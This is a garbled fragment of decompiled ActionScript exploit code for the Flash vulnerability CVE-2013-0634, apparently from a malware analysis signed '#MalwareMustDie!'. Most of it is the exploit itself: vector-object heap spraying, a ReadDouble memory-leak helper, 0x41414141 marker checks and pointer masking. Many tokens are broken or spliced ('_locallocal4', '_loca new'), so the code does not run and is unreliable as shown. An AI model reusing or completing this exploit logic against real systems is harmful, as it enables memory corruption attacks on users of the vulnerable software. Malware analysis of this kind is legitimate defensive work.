// CVE-2013-0634 Exploit Vector Object building method..

// The flood is formed by using var_local24 and _local4
// to be end up in the formation of _local3
// To the usage of the vector object as exploitation method..

"initiation"
var _local24: string;
var _local3: uint;
var _local4: ByteArray = new ByteArray();
var _local5: Vector. < Object > = new < Object > [];


"filling randomize character"
_local24 = "";
_local3 = 0;
    while (_local3 < 42) {
        _local24 = (_local24 + string.fromcharcode(this.randRange(97, 122)));
        _local3++;
    };
    
// preparing the vector object, exploitation method..

_local5[_local1] = new < Object > [new RegExp(_local24, ""), new < Number >
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1], new < Number > [0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1], new < Number > [0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1], new < Number > [0, 0, 0, 0, 0, 0, 0, 0, 
0 , 0, 0, 0, 0, 0, 0, 1], new < Number > [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, new < Number > [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
, 1], new < Number > [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1], 
new < Number > [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1], new < 
Object > [null, _local6, _local4, _local4, _local4, _local4, _local4, 
_local4, _local4, _local4, _local4, _local4, _local4, _local4, _local4, 
_local4, _local4, _local4, _local4, _local4, _locallocal4, _local4, 
_local4, _local4, _local4, _local4, _local4, _local4, _local4, _local4, 
_local4], new < Object > [null, _local6, _local4, _local4, _local4, 
_local4, _local4, _local4, _local4, _local4, _local4, _local4, _local4, 
_local4, _local4, _local4, _local4, _local4, _local4, _local4, _local4, 
_local4, _local4, _local4, _local4, _local4, _local4, _local4, _local4, 
_local4, _local4, _loca new < Object > [null, _local6, _local4, _local4, 
_local4, _local4, _local4, _local4, _local4, _local4, _local4, _local4,
 _local4, _local4, _local4, _local4, _local4, _local4, _local4, _local4
 , _local4, _local4, _local4, _local4, _local4, _local4, _local4, _loca
 l4, _local4, _local4, _local4, _local4], new < Object > [null, _local6
 , _local4, _local4, _local4, _local4, _local4, _local4, _local4,cal4, 
 _local4, _local4, _local4, _local4, _local4, _local4, _local4, _local4
 , _local4, _local4, _local4, _local4, _local4, _local4, _local4, _loca
 l4, _local4, _local4, _local4, _local4, _local4, _local4], new < Objec
 t > [null, _local6, _local4, _local4, _local4, _local4, _local4, _loca
 l4, _local4, _local4, _local4, _local4, _local4, _local4, _local4, _lo
 cal4, _local4, _local4, _local4, _local4ocal4, _local4, _local4, _loca
 l4, _local4, _local4, _local4, _local4, _local4, _local4, _local4, _lo
 cal4], new < Object > [null, _local6, _local4, _local4, _local4, _loca
 l4, _local4, _local4, _local4, _local4, _local4, _local4, _local4, _lo
 cal4, _local4, _local4, _local4, _local4, _local4, _local4, _local4, _
 local4, _local4, _local4, _local4, _local4, _local4, _local4, _local4,
  _local4, _locallocal4], new < Object > [null, _local6, _local4, _loca
  l4, _local4, _local4, _local4, _local4, _local4, _local4, _local4, _l
  ocal4, _local4, _local4, _local4, _local4, _local4, _local4, _local4,
   _local4, _local4, _local4, _local4, _local4, _local4, _local4, _loca
   l4, _local4, _local4, _local4, _local4, _local4]];


// Link between _local4 and _local5 is in here...the ReadDouble() function..

function ReadDouble(_arg1: Vector. < Number > , _arg2: uint): Vector. < uint > 
   { var _local3: Vector. < uint > = new < uint > [0, 0];
   var _local4: number = _arg1[_arg2];
   var _local5: ByteArray = new ByteArray();
   _local5.position = 0;
   _local5.writeDouble(_local4);
   _local3[1] = ((((_local5[0] * 16777216) + 
                (_local5[1] * 65536)) + (_local5[2] * 0x0100)) + _local5[3]);
   _local3[0] = ((((_local5[4] * 16777216) + (_local5[5] * 65536)) + 
                (_local5[6] * 0x0100)) + _local5[7]);
   return (_local3); 
   }

// to be called in many places...noted to keep the vector object forms..

if (this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), 17)[0] == 16) {
_local9 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), 17)[1];
if (this.ReadDouble((_local5[_local1][_local8] as Vector. < Number > ), 0)[0] == 0x41414141) {
if ((((this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local1)[1] == 32)) && ((this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), (_local1 + 1))[0] == 1)))) {
_local11 = (this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), (_local1 + 1))[1] & 0xFFFFFFF8);
_local12 = (this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), (_local1 + 2))[0] & 0xFFFFFFF8);
_local29 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), ((17 * _local1) + (_local1 - 1)));
_local30 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), ((17 * (_local1 + 1)) + _local1));
_local12 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];
_local12 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];
_local16 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];
_local26 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];
_local26 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[1];
_local12 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];
_local12 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];
(_local5[_local7][_local22] as Vector. < Number > )[_local15] = this.UintToDouble(_local12, this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[1]);
(_local5[_local7][_local22] as Vector. < Number > )[_local15] = this.UintToDouble(_local16, this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[1]);
if (this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), 16)[0] == 16) {
_local31 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), 17)[1];
_local9 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), 17)[0];
if (this.ReadDouble((_local5[_local1][_local8] as Vector. < Number > ), 0)[0] == 0x41414141) {
if ((((this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local1)[0] == 32)) && ((this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), (_local1 + 1))[0] == 1)))) {
_local11 = (this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), (_local1 + 2))[0] & 0xFFFFFFF8);
_local12 = (this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), (_local1 + 3))[0] & 0xFFFFFFF8);
if (((!((this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), (_local1 + 2))[1] == _local31))) || (!((this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), (_local1 + 3))[1] == _local31))))) {
_local29 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), ((16 * _local1) + (2 * (_local1 - 1))));
_local30 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), ((16 * (_local1 + 1)) + (2 * ((_local1 + 1) - 1))));
_local12 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];
_local12 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];
_local16 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];
_local12 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];
_local12 = this.ReadDouble((_local5[_local7][_local22] as Vector. < Number > ), _local15)[0];


#MalwareMustDie!